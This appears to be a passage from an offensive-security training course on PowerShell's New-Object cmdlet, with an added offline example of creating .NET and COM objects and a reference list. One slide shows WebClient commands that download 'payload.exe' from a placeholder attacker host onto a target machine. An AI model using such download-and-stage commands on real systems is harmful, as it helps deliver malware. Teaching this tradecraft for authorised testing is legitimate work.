"New-Object" cmdlet.



We can use the “New-Object” cmdlet to create an instance of a
.Net Framework object, or COM object.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/new-object?view=powershell-6



These can be created either as a "Type" of a .NET Framework
class, using the fully qualified name of the .NET class, or from
the "ProgID" of a COM object.

https://msdn.microsoft.com/en-us/library/system.type(v=vs.110).aspx



As an example of creating a basic object based off of a .NET class
with the "New-Object" cmdlet, we can use the "Net.WebClient"
.NET system class to download a file to a target system with the
following code:

PS C:\> $webclient = New-Object System.Net.WebClient
PS C:\> $payload_url = "https://attacker_host/payload.exe"
PS C:\> $file = "C:\ProgramData\payload.exe"
PS C:\> $webclient.DownloadFile($payload_url,$file)



In the example on the previous slide (line by line):
1. We create a variable called “$webclient” which instantiates the
“System.Net.WebClient” .NET class, which is used to create a web client.

2. We then create another variable ($payload_url), which is the URL to our
payload.

3. The "$file" variable is then used as the location to which we want to save
the payload on the target system.

4. And finally, we call the "$webclient" variable with the "DownloadFile"
method, which downloads our payload.exe to the target.
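Both creation styles described above, as an added example not taken from the course: a .NET class by its fully qualified type name and a COM object by its ProgID, each followed by Get-Member to see what the new object exposes. The WScript.Shell ProgID is an assumption that holds on any Windows host; nothing here touches the network.

```powershell
# Added example, not from the course slides. Runs offline; WScript.Shell is assumed present.

# 1. .NET class by fully qualified type name (the slide's WebClient)
$wc = New-Object -TypeName System.Net.WebClient
$wc.GetType().FullName                       # System.Net.WebClient
$wc | Get-Member -MemberType Method |
    Where-Object { $_.Name -like 'Download*' } |
    Select-Object -ExpandProperty Name       # DownloadData, DownloadFile, DownloadString, ...
$wc.Headers.Add('User-Agent', 'example-agent')   # properties can be set before any call
$wc.Dispose()

# The same idea with the [Type]::new() syntax PowerShell 5+ also accepts
$sb = [System.Text.StringBuilder]::new()
[void]$sb.Append('hello').Append(' world')
$sb.ToString()                               # hello world

# 2. COM object by ProgID
$shell = New-Object -ComObject WScript.Shell
$shell | Get-Member -MemberType Method | Select-Object -First 5
$shell.ExpandEnvironmentStrings('%ProgramData%')   # e.g. C:\ProgramData
$shell.SpecialFolders.Item('Desktop')
```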
We’ll see more examples of creating .NET and COM objects in the
module that follows, but for now, experiment and research on
ways you can use the “New-Object” cmdlet to create objects we
can leverage for offensive purposes.



And this concludes our lesson on PowerShell fundamentals.

Although we really only scratched the surface in regards to
PowerShell fundamentals, we encourage you to explore its
capabilities and apply those to your offensive work.

In the next Module, we'll be covering specific toolsets and even
more useful things we can do with PowerShell for our purposes.



References

CLI Introduction
http://radar.oreilly.com/2013/06/powershell-command-line-introduction.html

.NET Framework Classes
https://msdn.microsoft.com/en-us/library/gg145045(v=vs.110).aspx

Get-Help
https://technet.microsoft.com/en-us/library/cc764318.aspx

Script Blocks
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_script_blocks?view=powershell-6

Get-Command
https://ss64.com/ps/get-command.html

Pipeline
https://en.wikipedia.org/wiki/PowerShell#Pipeline

Cmdlet Overview
https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx

Modules
https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx

Script Modules
https://msdn.microsoft.com/en-us/library/dd878340(v=vs.85).aspx

ForEach-Object
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/foreach-object?view=powershell-6

Binary Modules
https://msdn.microsoft.com/en-us/library/dd878342(v=vs.85).aspx

Where-Object
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6

Manifest Modules
https://msdn.microsoft.com/en-us/library/dd878337(v=vs.85).aspx

Creating Custom Objects
https://technet.microsoft.com/en-us/library/hh750381.aspx

PowerSploit
https://github.com/PowerShellMafia/PowerSploit

New-Object
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/new-object?view=powershell-6
